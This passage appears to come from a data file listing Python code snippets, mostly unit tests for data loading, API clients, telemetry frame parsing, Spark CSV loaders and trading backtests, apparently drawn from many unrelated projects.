set(gfs[3].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def fetch_data(self):", "def test_from_object_df(self):\n df_test = make_simple_dataframe()\n df_read = BaseDataClass.from_object(df_test).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def test_data_source_soaps_get(self):\n pass", "def test_handle_data(self):\n for close in ('higher', 'lower'):\n print 'close:', close\n self.hd_args['close'] = close\n self.df_stock = self.backtest.handle_data(self.backtest.df_stock, **self.hd_args)\n print self.df_stock.to_string(line_width=400)\n\n print '=' * 100\n\n new_columns = ('found0', 'found1', 'found2',\n 'open_to_high', 'open_to_low', 'open_to_close')\n for column in new_columns:\n self.assertIn(column, self.df_stock.columns)", "def test_fetch_from_wide_table(self):\n try:\n self.storage.store(RECORD_TABLE, value=\"a\", extra_column=\"EEK!\")\n a = self.clerk.fetch(Record, 1)\n a.value=\"aa\"\n self.clerk.store(a)\n except AttributeError:\n self.fail(\"shouldn't die when columns outnumber attributes\")", "def _fetch_data(self):\n pass", "def test_fill_data_with_close_in_strikes(self):\n date = pd.to_datetime('2009-03-31')\n print 'testing date: %s' % date.strftime('%Y-%m-%d')\n self.full_iv.get_data()\n self.full_iv.df_stock = self.full_iv.df_stock[date:date]\n df_iv = 
self.full_iv.calc_iv()\n\n print df_iv\n self.assertTrue(len(df_iv))", "def test_fetchall(self):\n result = export.processExport(houseId=1)\n #We should have 2 locations * 1 sensor * 10 days of data here\n # 2 * 1 * (288 * 10) == 5670\n #print result.shape\n\n #result.to_csv(\"temp.csv\")\n #Do we get the right object\n self.assertEqual(type(result), pandas.DataFrame)\n #And is it the right size\n self.assertEqual(result.shape, (2880, 2)) #So 2880 samples from two sensors\n #And the right range of data\n self.assertEqual(result.index[0], datetime.datetime(2013, 01, 01))\n self.assertEqual(result.index[-1], datetime.datetime(2013, 01, 10, 23, 55))", "def test_number_of_rows_with_header(self):\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/forest-fires/forestfires.csv\"\n\n reader=requester.url_to_df(url)\n rows,columns=reader.shape\n self.assertEqual(rows,517)", "def test_coin_api_load_df_for_ta(self, mock_load):\n\n with open(\"tests/data/btc_usd_test_data.json\", encoding=\"utf8\") as f:\n sample_return = json.load(f)\n\n mock_load.return_value = sample_return\n mock_return, vs = dd_pycoingecko_view.load_ta_data(\n self.coin, [\"--vs\", \"usd\", \"--days\", \"30\"]\n )\n self.assertTrue(mock_return.shape == (31, 4))\n self.assertTrue(vs == \"usd\")", "def test_FRAME_DUoperations():\n tmFrame0 = CCSDS.FRAME.TMframe()\n print(\"tmFrame0 =\", tmFrame0)\n print(\"\")\n tmFrame1 = CCSDS.FRAME.TMframe(testData.TM_FRAME_01)\n print(\"tmFrame1 =\", tmFrame1)\n if tmFrame1.versionNumber != testData.TM_FRAME_01_versionNumber:\n print(\"tmFrame1 versionNumber wrong:\", tmFrame1.versionNumber, \"- should be\", testData.TM_FRAME_01_versionNumber)\n return False\n if tmFrame1.spacecraftId != testData.TM_FRAME_01_spacecraftId:\n print(\"tmFrame1 spacecraftId wrong:\", tmFrame1.spacecraftId, \"- should be\", testData.TM_FRAME_01_spacecraftId)\n return False\n if tmFrame1.virtualChannelId != testData.TM_FRAME_01_virtualChannelId:\n print(\"tmFrame1 virtualChannelId wrong:\", tmFrame1.virtualChannelId, \"- should be\", testData.TM_FRAME_01_virtualChannelId)\n return False\n if tmFrame1.operationalControlField != testData.TM_FRAME_01_operationalControlField:\n print(\"tmFrame1 operationalControlField wrong:\", tmFrame1.operationalControlField, \"- should be\", testData.TM_FRAME_01_operationalControlField)\n return False\n if tmFrame1.masterChannelFrameCount != testData.TM_FRAME_01_masterChannelFrameCount:\n print(\"tmFrame1 masterChannelFrameCount wrong:\", tmFrame1.masterChannelFrameCount, \"- should be\", testData.TM_FRAME_01_masterChannelFrameCount)\n return False\n if tmFrame1.virtualChannelFCountLow != testData.TM_FRAME_01_virtualChannelFCountLow:\n print(\"tmFrame1 virtualChannelFCountLow wrong:\", tmFrame1.virtualChannelFCountLow, \"- should be\", testData.TM_FRAME_01_virtualChannelFCountLow)\n return False\n if tmFrame1.secondaryHeaderFlag != testData.TM_FRAME_01_secondaryHeaderFlag:\n print(\"tmFrame1 secondaryHeaderFlag wrong:\", tmFrame1.secondaryHeaderFlag, \"- should be\", testData.TM_FRAME_01_secondaryHeaderFlag)\n return False\n if tmFrame1.synchronisationFlag != testData.TM_FRAME_01_synchronisationFlag:\n print(\"tmFrame1 synchronisationFlag wrong:\", tmFrame1.synchronisationFlag, \"- should be\", testData.TM_FRAME_01_synchronisationFlag)\n return False\n if tmFrame1.packetOrderFlag != testData.TM_FRAME_01_packetOrderFlag:\n print(\"tmFrame1 packetOrderFlag wrong:\", tmFrame1.packetOrderFlag, \"- should be\", testData.TM_FRAME_01_packetOrderFlag)\n return False\n if 
tmFrame1.segmentLengthId != testData.TM_FRAME_01_segmentLengthId:\n print(\"tmFrame1 segmentLengthId wrong:\", tmFrame1.segmentLengthId, \"- should be\", testData.TM_FRAME_01_segmentLengthId)\n return False\n if tmFrame1.firstHeaderPointer != testData.TM_FRAME_01_firstHeaderPointer:\n print(\"tmFrame1 firstHeaderPointer wrong:\", tmFrame1.firstHeaderPointer, \"- should be\", testData.TM_FRAME_01_firstHeaderPointer)\n return False\n # extract packets and check it\n leadingFragment, packets, trailingFragment = tmFrame1.getPackets()\n if leadingFragment != testData.TM_FRAME_01_leadingFragment:\n print(\"tmFrame1 leadingFragment wrong:\", leadingFragment, \"- should be\", testData.TM_FRAME_01_leadingFragment)\n return False\n if len(packets) != testData.TM_FRAME_01_nrPackets:\n print(\"tmFrame1 nr. of packets wrong:\", len(packets), \"- should be\", testData.TM_FRAME_01_nrPackets)\n return False\n if trailingFragment != testData.TM_FRAME_01_trailingFragment:\n print(\"tmFrame1 trailingFragment wrong:\", trailingFragment, \"- should be\", testData.TM_FRAME_01_trailingFragment)\n return False\n print(\"\")\n tcFrame1 = CCSDS.FRAME.TCframe(testData.TC_FRAME_01)\n print(\"tcFrame1 =\", tcFrame1)\n if tcFrame1.versionNumber != testData.TC_FRAME_01_versionNumber:\n print(\"tcFrame1 versionNumber wrong:\", tcFrame1.versionNumber, \"- should be\", testData.TC_FRAME_01_versionNumber)\n return False\n if tcFrame1.reservedFieldB != testData.TC_FRAME_01_reservedFieldB:\n print(\"tcFrame1 reservedFieldB wrong:\", tcFrame1.reservedFieldB, \"- should be\", testData.TC_FRAME_01_reservedFieldB)\n return False\n if tcFrame1.virtualChannelId != testData.TC_FRAME_01_virtualChannelId:\n print(\"tcFrame1 virtualChannelId wrong:\", tcFrame1.virtualChannelId, \"- should be\", testData.TC_FRAME_01_virtualChannelId)\n return False\n if tcFrame1.controlCommandFlag != testData.TC_FRAME_01_controlCommandFlag:\n print(\"tcFrame1 controlCommandFlag wrong:\", tcFrame1.controlCommandFlag, \"- should be\", testData.TC_FRAME_01_controlCommandFlag)\n return False\n if tcFrame1.reservedFieldA != testData.TC_FRAME_01_reservedFieldA:\n print(\"tcFrame1 reservedFieldA wrong:\", tcFrame1.reservedFieldA, \"- should be\", testData.TC_FRAME_01_reservedFieldA)\n return False\n if tcFrame1.frameLength != testData.TC_FRAME_01_frameLength:\n print(\"tcFrame1 frameLength wrong:\", tcFrame1.frameLength, \"- should be\", testData.TC_FRAME_01_frameLength)\n return False\n if tcFrame1.sequenceNumber != testData.TC_FRAME_01_sequenceNumber:\n print(\"tcFrame1 sequenceNumber wrong:\", tcFrame1.sequenceNumber, \"- should be\", testData.TC_FRAME_01_sequenceNumber)\n return False\n if tcFrame1.spacecraftId != testData.TC_FRAME_01_spacecraftId:\n print(\"tcFrame1 spacecraftId wrong:\", tcFrame1.spacecraftId, \"- should be\", testData.TC_FRAME_01_spacecraftId)\n return False\n if tcFrame1.bypassFlag != testData.TC_FRAME_01_bypassFlag:\n print(\"tcFrame1 bypassFlag wrong:\", tcFrame1.bypassFlag, \"- should be\", testData.TC_FRAME_01_bypassFlag)\n return False\n tcFrame2 = CCSDS.FRAME.TCframe(testData.TC_FRAME_02)\n if tcFrame2.versionNumber != testData.TC_FRAME_02_versionNumber:\n print(\"tcFrame2 versionNumber wrong:\", tcFrame2.versionNumber, \"- should be\", testData.TC_FRAME_02_versionNumber)\n return False\n if tcFrame2.reservedFieldB != testData.TC_FRAME_02_reservedFieldB:\n print(\"tcFrame2 reservedFieldB wrong:\", tcFrame2.reservedFieldB, \"- should be\", testData.TC_FRAME_02_reservedFieldB)\n return False\n if tcFrame2.virtualChannelId != 
testData.TC_FRAME_02_virtualChannelId:\n print(\"tcFrame2 virtualChannelId wrong:\", tcFrame2.virtualChannelId, \"- should be\", testData.TC_FRAME_02_virtualChannelId)\n return False\n if tcFrame2.controlCommandFlag != testData.TC_FRAME_02_controlCommandFlag:\n print(\"tcFrame2 controlCommandFlag wrong:\", tcFrame2.controlCommandFlag, \"- should be\", testData.TC_FRAME_02_controlCommandFlag)\n return False\n if tcFrame2.reservedFieldA != testData.TC_FRAME_02_reservedFieldA:\n print(\"tcFrame2 reservedFieldA wrong:\", tcFrame2.reservedFieldA, \"- should be\", testData.TC_FRAME_02_reservedFieldA)\n return False\n if tcFrame2.frameLength != testData.TC_FRAME_02_frameLength:\n print(\"tcFrame2 frameLength wrong:\", tcFrame2.frameLength, \"- should be\", testData.TC_FRAME_02_frameLength)\n return False\n if tcFrame2.sequenceNumber != testData.TC_FRAME_02_sequenceNumber:\n print(\"tcFrame2 sequenceNumber wrong:\", tcFrame2.sequenceNumber, \"- should be\", testData.TC_FRAME_02_sequenceNumber)\n return False\n if tcFrame2.spacecraftId != testData.TC_FRAME_02_spacecraftId:\n print(\"tcFrame2 spacecraftId wrong:\", tcFrame2.spacecraftId, \"- should be\", testData.TC_FRAME_02_spacecraftId)\n return False\n if tcFrame2.bypassFlag != testData.TC_FRAME_02_bypassFlag:\n print(\"tcFrame2 bypassFlag wrong:\", tcFrame2.bypassFlag, \"- should be\", testData.TC_FRAME_02_bypassFlag)\n return False\n clcw = CCSDS.FRAME.CLCW()\n print(\"clcw =\", clcw)\n return True", "def test_observation_info(dl1_file):\n from ctapipe.io.tableloader import TableLoader\n\n with TableLoader(dl1_file, load_observation_info=True) as table_loader:\n table = table_loader.read_telescope_events()\n assert \"subarray_pointing_lat\" in table.colnames", "def test_get_df_db(oracle_connector):\n data_sources_spec = [\n {\n 'domain': 'Oracle test',\n 'type': 'external_database',\n 'name': 'my_oracle_sql_con',\n 'query': 'SELECT * FROM City;',\n }\n ]\n\n data_source = OracleSQLDataSource(**data_sources_spec[0])\n df = oracle_connector.get_df(data_source)\n\n assert not df.empty\n assert df.shape == (50, 5)\n assert set(df.columns) == {'ID', 'NAME', 'COUNTRYCODE', 'DISTRICT', 'POPULATION'}\n\n assert len(df[df['POPULATION'] > 500000]) == 5", "def test_crypto_currencies_pandas_python2(self, mock_urlopen):\n cc = CryptoCurrencies(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_INTRADAY&symbol=BTC&market=CNY&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = cc.get_digital_currency_intraday(\n symbol='BTC', market='CNY')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_get_record(self):\n pass", "def testReadDataFile(self):\n try:\n blockNameList = []\n myReader = ParseCifSimple(self.__pathPdbxDataFile, False, 0, 255, \"?\", self.__logFileName)\n blockNameList = myReader.GetBlockNames(blockNameList)\n #\n for blockName in blockNameList:\n block = myReader.GetBlock(blockName)\n tableNameList = []\n tableNameList = block.GetTableNames(tableNameList)\n for tableName in tableNameList:\n table = block.GetTable(tableName)\n columnNameList = table.GetColumnNames()\n logger.debug(\"Table %s colunms %r\", tableName, columnNameList)\n numRows = table.GetNumRows()\n rowList = []\n for iRow in range(0, numRows):\n row = table.GetRow(iRow)\n rowList.append(row)\n logger.debug(\"table %s row length %d\", tableName, len(rowList))\n except Exception as e:\n 
logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def test_read_data(dbh):\n assert len(dbh.trading_history) == 0\n dbh.read_data()\n assert len(dbh.trading_history) > 0\n dbh.trading_history = []\n assert len(dbh.trading_history) == 0\n dbh.read_data(currentdir+'/../test/test_data/trading_log.json')\n assert len(dbh.trading_history) > 0", "def test_acquire_dataset(self):\n\n # make sure the data does not yet exist\n with self.subTest(name='no data yet'):\n response = Epidata.covid_hosp('MA', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], -2)\n\n # acquire sample data into local database\n # mock out network calls to external hosts\n with self.subTest(name='first acquisition'), \\\n patch.object(Network, 'fetch_metadata', return_value=self.test_utils.load_sample_metadata()) as mock_fetch_meta, \\\n patch.object(Network, 'fetch_dataset', side_effect=[self.test_utils.load_sample_dataset(\"dataset0.csv\"), # dataset for 3/13\n self.test_utils.load_sample_dataset(\"dataset0.csv\"), # first dataset for 3/15\n self.test_utils.load_sample_dataset()] # second dataset for 3/15\n ) as mock_fetch:\n acquired = Update.run()\n self.assertTrue(acquired)\n self.assertEqual(mock_fetch_meta.call_count, 1)\n\n # make sure the data now exists\n with self.subTest(name='initial data checks'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], 1)\n self.assertEqual(len(response['epidata']), 1)\n row = response['epidata'][0]\n self.assertEqual(row['state'], 'WY')\n self.assertEqual(row['date'], 20201209)\n self.assertEqual(row['issue'], 20210315)\n self.assertEqual(row['critical_staffing_shortage_today_yes'], 8)\n actual = row['inpatient_bed_covid_utilization']\n expected = 0.11729857819905214\n self.assertAlmostEqual(actual, expected)\n self.assertIsNone(row['critical_staffing_shortage_today_no'])\n\n # expect 61 fields per row (63 database columns, except `id` and `record_type`)\n self.assertEqual(len(row), 61)\n\n with self.subTest(name='all date batches acquired'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101), issues=20210313)\n self.assertEqual(response['result'], 1)\n\n # re-acquisition of the same dataset should be a no-op\n with self.subTest(name='second acquisition'), \\\n patch.object(Network, 'fetch_metadata', return_value=self.test_utils.load_sample_metadata()) as mock_fetch_meta, \\\n patch.object(Network, 'fetch_dataset', return_value=self.test_utils.load_sample_dataset()) as mock_fetch:\n acquired = Update.run()\n self.assertFalse(acquired)\n\n # make sure the data still exists\n with self.subTest(name='final data checks'):\n response = Epidata.covid_hosp('WY', Epidata.range(20200101, 20210101))\n self.assertEqual(response['result'], 1)\n self.assertEqual(len(response['epidata']), 1)", "def test_context_data(self):\n response = self.client.get(self.get_url())\n context = response.context\n self.assertIn('source_dataset_table', context)\n for ds in self.datasets:\n self.assertIn(ds, context['source_dataset_table'].data)\n self.assertIsInstance(context['source_dataset_table'], tables.SourceDatasetTableFull)", "def test_sector_perfomance_python2(self, mock_urlopen):\n sp = SectorPerformances(key=TestAlphaVantage._API_KEY_TEST)\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, dict, 'Result 
Data must be a dictionary')", "def test_sector_perfomance_pandas(self, mock_request):\n sp = SectorPerformances(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"http://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(\"mock_sector\")\n with open(path_file) as f:\n mock_request.get(url, text=f.read())\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_open_order_sheet(self):\n order_processor = OrderProcessor()\n order_processor.open_order_sheet('COMP_3522_A4_orders.xlsx')\n self.assertTrue(self, isinstance(order_processor.orders_data_frame,\n DataFrame))", "def test_zero_lookback_window(self, mock_get_prices):\n class BuyBelow10(Moonshot):\n \"\"\"\n A basic test strategy that buys below 10.\n \"\"\"\n DB = 'test-db'\n LOOKBACK_WINDOW = 0\n\n def prices_to_signals(self, prices):\n signals = prices.loc[\"Close\"] < 10\n return signals.astype(int)\n\n def _mock_get_prices():\n\n dt_idx = pd.DatetimeIndex([\"2018-05-01\",\"2018-05-02\",\"2018-05-03\", \"2018-05-04\"])\n fields = [\"Close\",\"Volume\"]\n idx = pd.MultiIndex.from_product([fields, dt_idx], names=[\"Field\", \"Date\"])\n\n prices = pd.DataFrame(\n {\n \"FI12345\": [\n #Close\n 9,\n 11,\n 10.50,\n 9.99,\n # Volume\n 5000,\n 16000,\n 8800,\n 9900\n ],\n \"FI23456\": [\n # Close\n 9.89,\n 11,\n 8.50,\n 10.50,\n # Volume\n 15000,\n 14000,\n 28800,\n 17000\n\n ],\n },\n index=idx\n )\n\n return prices\n\n def mock_download_master_file(f, *args, **kwargs):\n\n master_fields = [\"Timezone\", \"Symbol\", \"SecType\", \"Currency\", \"PriceMagnifier\", \"Multiplier\"]\n securities = pd.DataFrame(\n {\n \"FI12345\": [\n \"America/New_York\",\n \"ABC\",\n \"STK\",\n \"USD\",\n None,\n None\n ],\n \"FI23456\": [\n \"America/New_York\",\n \"DEF\",\n \"STK\",\n \"USD\",\n None,\n None,\n ]\n },\n index=master_fields\n )\n securities.columns.name = \"Sid\"\n securities.T.to_csv(f, index=True, header=True)\n f.seek(0)\n\n mock_get_prices.return_value = _mock_get_prices()\n\n with patch(\"moonshot.strategies.base.download_master_file\", new=mock_download_master_file):\n results = BuyBelow10().backtest(start_date=\"2018-05-01\", end_date=\"2018-05-04\")\n\n get_prices_call = mock_get_prices.mock_calls[0]\n _, args, kwargs = get_prices_call\n self.assertListEqual(kwargs[\"codes\"], [\"test-db\"])\n self.assertEqual(kwargs[\"start_date\"], \"2018-05-01\")\n self.assertEqual(kwargs[\"end_date\"], \"2018-05-04\")\n self.assertEqual(kwargs[\"fields\"], ['Open', 'Close', 'Volume'])\n self.assertIsNone(kwargs[\"timezone\"])\n self.assertTrue(kwargs[\"infer_timezone\"])", "def test_get_metadata_df(self):\n\n # first need to populate LabMetadata tables\n from data_processors.lims.lambdas import labmetadata\n labmetadata.scheduled_update_handler({'event': \"test_get_metadata_df\"}, None)\n\n logger.info(f\"Lab metadata count: {LabMetadata.objects.count()}\")\n\n # SEQ-II validation dataset\n mock_bcl_workflow: Workflow = WorkflowFactory()\n mock_sqr: SequenceRun = mock_bcl_workflow.sequence_run\n mock_sqr.run_id = \"r.Uvlx2DEIME-KH0BRyF9XBg\"\n mock_sqr.instrument_run_id = \"200612_A01052_0017_BH5LYWDSXY\"\n mock_sqr.gds_volume_name = \"bssh.acddbfda498038ed99fa94fe79523959\"\n mock_sqr.gds_folder_path = f\"/Runs/{mock_sqr.instrument_run_id}_{mock_sqr.run_id}\"\n mock_sqr.sample_sheet_name = \"SampleSheet.csv\"\n mock_sqr.name = mock_sqr.instrument_run_id\n mock_sqr.save()\n\n mock_library_run = LibraryRun(\n 
instrument_run_id=mock_sqr.instrument_run_id,\n run_id=mock_sqr.run_id,\n library_id=\"L2000199\",\n lane=1,\n override_cycles=\"Y151;I8N2;U10;Y151\",\n )\n mock_library_run.save()\n\n samplesheet_path = f\"{mock_sqr.gds_folder_path}/{mock_sqr.sample_sheet_name}\"\n\n metadata_df = bcl_convert.get_metadata_df(\n gds_volume=mock_sqr.gds_volume_name,\n samplesheet_path=samplesheet_path\n )\n\n logger.info(\"-\" * 32)\n logger.info(f\"\\n{metadata_df}\")\n\n self.assertTrue(not metadata_df.empty)\n self.assertTrue(\"PTC_SsCRE200323LL_L2000172_topup\" in metadata_df[\"sample\"].tolist())\n\n if \"\" in metadata_df[\"override_cycles\"].unique().tolist():\n logger.info(\"-\" * 32)\n logger.info(\"THERE SEEM TO BE BLANK OVERRIDE_CYCLES METADATA FOR SOME SAMPLES...\")\n self.assertFalse(\"\" in metadata_df[\"override_cycles\"].tolist())\n # This probably mean need to fix data, look for corresponding Lab Metadata entry...\n\n library_id_list = metadata_df[\"library_id\"].tolist()\n library_run_list = libraryrun_srv.link_library_runs_with_x_seq_workflow(library_id_list, mock_bcl_workflow)\n self.assertIsNotNone(library_run_list)\n self.assertEqual(1, len(library_run_list))\n self.assertEqual(mock_library_run.library_id, library_run_list[0].library_id)\n\n library_run_in_workflows = mock_bcl_workflow.libraryrun_set.all()\n self.assertEqual(1, library_run_in_workflows.count())", "def test_get_records(self):\n pass", "def test_read(self):\n df = dep.read_env(get_path('good_env.txt'))\n df2 = df[df['date'] == datetime.datetime(2010, 6, 5)]\n self.assertEqual(len(df2.index), 1)\n row = df2.iloc[0]\n self.assertEquals(row['runoff'], 86.3)", "def test_load_success_large_dataset(self, mock_class):\n\n # ARRANGE\n input_data = \"\"\"\n CHILDRENS HOSPITAL DIALYSIS,012306,013300,1600 7TH AVENUE SOUTH,-,BIRMINGHAM,AL,35233,99\n GADSDEN DIALYSIS,012501,-,409 SOUTH FIRST STREET,-,GADSDEN,AL,35901,100\n TUSCALOOSA UNIVERSITY DIALYSIS,012502,-,220 15TH STREET,-,TUSCALOOSA,AL,35401,0\n DOTHAN DIALYSIS,012506,-,216 GRACELAND DR.,-,DOTHAN,AL,36305,88\n \"\"\"\n input_df: DataFrame = self.create_data_frame_from_csv_string(input_data)\n\n # ACT\n loader: LoaderCsv = LoaderCsv({'path': TestLoaderCsv.output_file})\n loader.load(TestLoaderCsv.spark, input_df)\n\n # ASSERT\n path = f'file://{TestLoaderCsv.output_file}'\n df: DataFrame = TestLoaderCsv.spark.read.csv(path, header=True)\n # TODO: you can replace the above statement with code to read from\n # a database table; see case_study/etl/extract/extractor_db.py\n\n assert df.columns == [\n 'facility_name', 'cms_certification_number_ccn', 'alternate_ccn_1', 'address_1',\n 'address_2', 'city', 'state', 'zip_code', 'total_performance_score'\n ]\n assert df.count() == 4\n\n df.createOrReplaceTempView('loaded_data') # used in SQL queries below\n\n # verify one value of one row\n result: Row = self.spark.sql(\"\"\"\n select total_performance_score score \n from loaded_data\n where cms_certification_number_ccn == '012306'\n \"\"\").collect()[0]\n assert result.score == '99'\n\n # assert df.select(df.total_performance_score) \\\n # .where(df.cms_certification_number_ccn == '012306')\\\n # .collect()[0] == '99'\n\n # verify that a record is not present (i.e., it should have been\n # filtered out by the tranform operation)\n assert not self.spark.sql(\"\"\"\n select * \n from loaded_data\n where cms_certification_number_ccn == '012307'\n \"\"\").collect()", "def test_empty_data_frame(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n 
deproxy_cl.parsing = False\n request_body = \"123\"\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n deproxy_cl.make_request(request=\"\", end_stream=False)\n deproxy_cl.make_request(request=request_body, end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_fetch():\n service = WebService(TestFactory())\n query = service.parse(\n parse_qs(\n \"id=BOU&starttime=2016-06-06\"\n \"&endtime=2016-06-07&elements=H,E,Z,F&sampling_period=60\"\n \"&format=iaga2002&type=variation\"\n )\n )\n timeseries = service.fetch(query)\n assert_equal(isinstance(timeseries, Stream), True)", "def testWeatherFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'weather',\n orderBy = [timeCol],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def _fetch_data(self, samples):\n pass", "def test_load_success_small_dataset(self, mock_class):\n\n # ARRANGE\n input_data = \"\"\"\n CHILDRENS HOSPITAL DIALYSIS,012306,013300,1600 7TH AVENUE SOUTH,-,BIRMINGHAM,AL,35233,99\n GADSDEN DIALYSIS,012501,-,409 SOUTH FIRST STREET,-,GADSDEN,AL,35901,100\n TUSCALOOSA UNIVERSITY DIALYSIS,012502,-,220 15TH STREET,-,TUSCALOOSA,AL,35401,0\n DOTHAN DIALYSIS,012506,-,216 GRACELAND DR.,-,DOTHAN,AL,36305,88\n \"\"\"\n input_df: DataFrame = self.create_data_frame_from_csv_string(input_data)\n\n # ACT\n loader: LoaderCsv = LoaderCsv({'path': TestLoaderCsv.output_file})\n loader.load(TestLoaderCsv.spark, input_df)\n\n # ASSERT\n path = f'file://{TestLoaderCsv.output_file}'\n df_from_loaded_csv: DataFrame = \\\n TestLoaderCsv.spark.read.csv(path, header=True)\n\n assert df_from_loaded_csv.columns == [\n 'facility_name', 'cms_certification_number_ccn', 'alternate_ccn_1', 'address_1',\n 'address_2', 'city', 'state', 'zip_code', 'total_performance_score'\n ]\n self.assert_dataframe_contents(df_from_loaded_csv, [\n ['CHILDRENS HOSPITAL DIALYSIS', '012306', '013300', '1600 7TH AVENUE SOUTH', '-', 'BIRMINGHAM', 'AL', '35233', '99'],\n ['GADSDEN DIALYSIS', '012501', '-', '409 SOUTH FIRST STREET', '-', 'GADSDEN', 'AL', '35901', '100'],\n ['TUSCALOOSA UNIVERSITY DIALYSIS', '012502', '-', '220 15TH STREET', '-', 'TUSCALOOSA', 'AL', '35401', '0'],\n ['DOTHAN DIALYSIS', '012506', '-', '216 GRACELAND DR.', '-', 'DOTHAN', 'AL', '36305', '88'],\n ])", "def test_fetch_traces(self):\n try:\n self.tsp_client.fetch_traces()\n except Exception as e:\n pytest.exit(str(e))\n # Deleting left-over data here doesn't work consistently, but remains handy if tests fail.\n self._delete_experiments()\n self._delete_traces()", "def test_header(self):\n frame_with_header = self.context.frame.import_csv(\n self.dataset, schema=self.schema, header=True)\n frame_without_header = self.context.frame.import_csv(self.dataset,\n schema=self.schema, header=False)\n\n # the frame with the header should have one less row\n # because it should have skipped the first line\n self.assertEqual(len(frame_with_header.take(frame_with_header.count()).data),\n len(frame_without_header.take(frame_without_header.count()).data) - 1)\n # comparing the content of the frame with header and without\n # they should have the same rows with the only differnce being the\n # frame with the header should not have the first row\n for index in xrange(0, frame_with_header.count()):\n self.assertEqual(str(frame_with_header.take(frame_with_header.count()).data[index]),\n 
str(frame_without_header.take(frame_without_header.count()).data[index + 1]))", "def test_import(import_data):\n try:\n df_tab = import_data()\n logging.info(\"Testing import_data: Successfully Found File\")\n except FileNotFoundError as err:\n logging.error(\"Testing import_data: The file wasn't found\")\n raise err\n\n try:\n assert df_tab.shape[0] > 0\n assert df_tab.shape[1] > 0\n logging.info(\"Testing import_data: Successfully Available Data\")\n except AssertionError as err:\n logging.error(\n \"Testing import_data: The file doesn't appear to have rows and columns\"\n )\n raise err\n\n return df_tab", "def test_fetchlocation(self):\n result = export.processExport(houseId=1,\n locationIds = [1,],\n )\n\n self.assertEqual(result.shape, (2880, 1))\n self.assertEqual(result.columns[0], LOC1)\n\n result = export.processExport(houseId=1,\n locationIds = [2,],\n )\n\n self.assertEqual(result.shape, (2880, 1))\n self.assertEqual(result.columns[0], LOC2)", "def retrieve(osm_path,geoType,keyCol,**valConstraint):\n driver=ogr.GetDriverByName('OSM')\n data = driver.Open(osm_path)\n query = query_b(geoType,keyCol,**valConstraint)\n sql_lyr = data.ExecuteSQL(query)\n features =[]\n # cl = columns \n cl = ['osm_id'] \n for a in keyCol: cl.append(a)\n if data is not None:\n print('query is finished, lets start the loop')\n for feature in tqdm(sql_lyr):\n try:\n if feature.GetField(keyCol[0]) is not None:\n geom = from_wkb(feature.geometry().ExportToWkb()) \n if geom is None:\n continue\n # field will become a row in the dataframe.\n field = []\n for i in cl: field.append(feature.GetField(i))\n field.append(geom) \n features.append(field)\n except:\n print(\"WARNING: skipped OSM feature\") \n else:\n print(\"ERROR: Nonetype error when requesting SQL. Check required.\") \n cl.append('geometry') \n if len(features) > 0:\n return pandas.DataFrame(features,columns=cl)\n else:\n print(\"WARNING: No features or No Memory. 
returning empty GeoDataFrame\") \n return pandas.DataFrame(columns=['osm_id','geometry'])", "def test_unpack_dataframe(self, batched_df, expected):\n unpacked_list = _BatchingManager.split_dataframe(batched_df, 1)\n assert len(unpacked_list) == 1\n # On windows, conversion dtype is not preserved.\n check_dtype = not os.name == \"nt\"\n pd.testing.assert_frame_equal(\n unpacked_list[0].reset_index(drop=True),\n expected.reset_index(drop=True),\n check_dtype=check_dtype,\n )", "def find_all_ORFs_oneframe_unit_tests():\n data_list = [\n [\"ATGCATGAATGTAGATAGATGTGCCC\", [\"ATGCATGAATGTAGA\", \"ATGTGCCC\"]],\n [\"ATGTAGATGTAG\", [\"ATG\", \"ATG\"]],\n [\"ATGATGATG\", [\"ATGATGATG\"]],\n [\"ATGGGGGATTAGATGATG\", [\"ATGGGGGAT\", \"ATGATG\"]],\n [\"ATGTGAATGTAA\", [\"ATG\", \"ATG\"]],\n [\"ATGTGAATGTAAATG\", [\"ATG\", \"ATG\", \"ATG\"]],\n [\"ATGCGTGGTGATTAGATGGATGGGGATTGA\", [\"ATGCGTGGTGAT\", \"ATGGATGGGGAT\"]],\n [\"ATGAAATTTCCCGGGAAATTTCCCGGG\", [\"ATGAAATTTCCCGGGAAATTTCCCGGG\"]],\n [\"ATGAAATTTTGAATGGGGCCC\", [\"ATGAAATTT\", \"ATGGGGCCC\"]],\n [\"ATGAAATTTTGAATGGGGCCCTAG\", [\"ATGAAATTT\", \"ATGGGGCCC\"]],\n ]\n for data in data_list:\n if len(data) == 2:\n print \"input: \" + str(data[0]) + \",\",\n print \"expected output: \" + str(data[1]) + \",\",\n o = find_all_ORFs_oneframe(data[0])\n print \"actual output: \" + str(o)\n if o != data[1]:\n print \"## Test Fail Here!\"", "def test_fetch_flow_cell_retrieve_specified_flow_cell(\n mock_store,\n mock_flow_cell,\n mock_tar,\n mock_get_first_flow_cell,\n mock_check_processing,\n mock_get_archived_key,\n mock_get_archived_flow_cell,\n archived_key,\n archived_flow_cell,\n 